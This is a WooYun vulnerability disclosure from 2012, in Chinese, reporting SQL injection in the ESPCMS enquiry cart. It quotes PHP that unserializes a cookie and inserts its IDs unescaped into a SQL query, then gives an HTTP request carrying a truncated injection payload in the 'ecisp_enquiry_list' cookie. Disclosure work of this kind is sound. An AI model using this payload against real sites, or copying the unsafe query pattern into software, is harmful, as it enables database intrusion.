当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-09471

漏洞标题:ESPCMS SQL注入漏洞

相关厂商:ESPCMS

漏洞作者: Zvall

提交时间:2012-07-11 11:31

修复时间:2012-08-25 11:32

公开时间:2012-08-25 11:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-07-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-08-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

SQL注入

详细说明:

$membercookieview = $this->member_cookieview();
if (!empty($membercookieview['userid']) && !empty($membercookieview['username'])) {
$rsMember = $this->get_member(null, $membercookieview['userid']);
}
$this->pagetemplate->assign('member', $rsMember);
}
$cartid = $this->fun->accept('ecisp_enquiry_list', 'C');
$cartid = stripslashes(htmlspecialchars_decode($cartid));
$uncartid = !empty($cartid) ? unserialize($cartid) : 0;
if ($uncartid && is_array($uncartid)) {
$didarray = $this->fun->key_array_name($uncartid, 'did', 'amount');
$didlist = $this->fun->format_array_text(array_keys($didarray), ',');
if (!empty($didlist)) {
$db_table = db_prefix . 'document';
$db_where = "isclass=1 AND did in($didlist) ORDER BY did DESC";
echo $sql = "SELECT * FROM $db_table WHERE $db_where";
$rs = $this->db->query($sql);
$productmoney = 0;
while ($rsList = $this->db->fetch_assoc($rs)) {
$rsList['link'] = $this->get_link('doc', $rsList, admin_LNG);
$rsList['buylink'] = $this->get_link('buylink', $rsList, admin_LNG);
$rsList['enqlink'] = $this->get_link('enqlink', $rsList, admin_LNG);
$rsList['dellink'] = $this->get_link('enqdel', $rsList, admin_LNG);
$rsList['ctitle'] = empty($rsList['color']) ? $rsList['title'] : "<font color='" . $rsList['color'] . "'>" . $rsList['title'] . "</font>";
$rsList['amount'] = $didarray[$rsList['did']];
$array[] = $rsList;

漏洞证明:

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/ESP/index.php?ac=enquiry&at=into&did=27
Cookie: ecisp_home_seccode=XXWCeH9lPaRlZmVZcamUmYs; ecisp_member_username=o6DFzQ; ecisp_member_info=arPekrVo4p6hxZ91qqKQx6fRr5SWl2WZkWhslJfgZWloZ5mSb2uZY7SbZmeaZZKUaMlqw53JZ5SRl5zFyJVmnm5pmJJumZ-Smt6YZ22Sl5ttnJfEnJ1nkppinMfKm2hva5mVx3GZyJGdlw; ecisp_enquiry_list=a%3A1%3A%7Bs%3A3%3A%22k27%22%3Ba%3A2%3A%7Bs%3A3%3A%22did%22%3Bs%3A8%3A%22%27
官方太不给力了!!加Q 三次。不给通过。
加了Q 给他提问题 不理人!!愤怒呀


修复方案:

你懂!

版权声明:转载请注明来源 Zvall@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2012-07-11 22:28 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    intal

  2. 2013-03-07 18:23 | Seay ( 实习白帽子 | Rank:65 漏洞数:8 )

    官方太不给力了!!加Q 三次。不给通过。加了Q 给他提问题 不理人!!愤怒呀我还是直接放出来吧。。。

  3. 2013-03-07 19:22 | Php0day ( 路人 | Rank:1 漏洞数:1 | php安全开发、代码审计、渗透测试。)

    前排支持......

  4. 2013-03-08 10:20 | P w ( 实习白帽子 | Rank:72 漏洞数:14 | -这家伙很懒,什么都没有留下。其实我真的很...)

    支持+1! 哈哈